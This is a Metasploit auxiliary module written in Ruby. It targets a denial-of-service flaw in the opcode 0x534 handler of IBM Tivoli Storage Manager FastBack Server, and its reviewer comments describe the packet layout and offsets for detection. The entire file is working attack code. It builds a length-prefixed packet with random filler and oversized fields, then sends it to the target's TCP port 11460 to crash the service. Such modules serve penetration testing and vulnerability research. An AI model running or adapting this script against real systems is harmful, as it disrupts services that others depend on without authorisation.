##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary denial-of-service module for IBM Tivoli Storage Manager FastBack Server.
#
# Msf::Exploit::Remote::Tcp supplies connect / sock / disconnect and the RHOST/RPORT
# options; Msf::Auxiliary::Dos marks the module as a DoS check.  The module sends a
# single framed message (see #tv_pkt) and reads nothing back.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata and the one module-specific option.
  #
  # @param info [Hash] caller-supplied module info, merged through update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service",
      'Description' => %q{
        This module exploits a denial of service condition present in IBM Tivoli Storage Manager
        FastBack Server when dealing with packets triggering the opcode 0x534 handler.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Gianni Gnesa', # Public disclosure/Proof of Concept
          'William Webb <william_webb[at]rapid7.com>', # Metasploit
        ],
      'References' =>
        [
          ['EDB', '38979'],
          ['OSVDB', '132307']
        ],
      'DisclosureDate' => "Dec 15 2015",
    ))

    # Only the default port is overridden; everything else comes from the Tcp mixin.
    register_options(
      [
        Opt::RPORT(11460)
      ])
  end

  # Builds one length-prefixed FastBack message.
  #
  # Body layout, exactly as assembled below (every dword is little-endian, "V"):
  #   12 random alpha bytes, opcode, 0, p1.length, p1.length, p2.length,
  #   p1.length + p2.length, p3.length, 8 random alpha bytes, p1, p2, p3.
  # The body is then prefixed with its own length as a big-endian dword ("N").
  # How the server interprets the repeated and summed length fields is not visible
  # in this file.
  #
  # @param opcode [Integer] handler opcode written right after the 12-byte random prefix
  # @param p1 [String] first payload field
  # @param p2 [String] second payload field
  # @param p3 [String] third payload field
  # @return [String] the framed packet, ready for sock.put
  #
  # NOTE(review): the length fields use String#length (characters), which equals the
  # byte count only for ASCII input; every caller in this file passes ASCII from
  # rand_text_alpha / String#%, so the two agree here.
  def tv_pkt(opcode, p1="", p2="", p3="")
    buf = Rex::Text.rand_text_alpha(0x0C)
    buf += [opcode].pack("V")
    buf += [0x00].pack("V")
    buf += [p1.length].pack("V")
    buf += [p1.length].pack("V")
    buf += [p2.length].pack("V")
    buf += [p1.length + p2.length].pack("V")
    buf += [p3.length].pack("V")

    buf += Rex::Text.rand_text_alpha(0x08)

    buf += p1
    buf += p2
    buf += p3

    # Outer frame: 4-byte big-endian body length, then the body.
    pkt = [buf.length].pack("N")
    pkt << buf

    return pkt
  end

  # Sends a single opcode 0x534 message to RHOST:RPORT and reports the outcome.
  #
  # Connects through the Tcp mixin, builds the packet, writes it once and always
  # disconnects in `ensure`.  The method-level rescue (no explicit begin) turns the
  # listed transport errors into a status line plus elog entry instead of raising.
  # Nothing is read back, so "Packet sent!" only means the write completed, not that
  # the target was affected.
  #
  # For detection: in the bytes on the wire the opcode dword sits at offset 16
  # (4-byte length prefix + 12 random bytes), and the first payload field is a
  # "File: ... From: ... To: ... ChunkLoc: ... FileLoc: ..." record whose File
  # value is 0x200 random alpha characters.
  def run
    target_opcode = 0x534

    connect
    print_status("Connected to: #{rhost} port: #{rport}")
    print_status("Sending malicious packet")

    # p1: formatted record with a 0x200-char random File value and zeroed counters;
    # p2, p3: 0x60 random alpha characters each.
    p = tv_pkt(target_opcode,
      "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0],
      Rex::Text.rand_text_alpha(0x60),
      Rex::Text.rand_text_alpha(0x60)
    )

    sock.put(p)
    print_status("Packet sent!")
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => ex
    print_status("Exploit failed: #{ex.class} #{ex.message}")
    elog("#{ex.class} #{ex.message}\n#{ex.backtrace * "\n"}")
  ensure
    # Runs on every path, including after a rescued transport error.
    disconnect
  end
end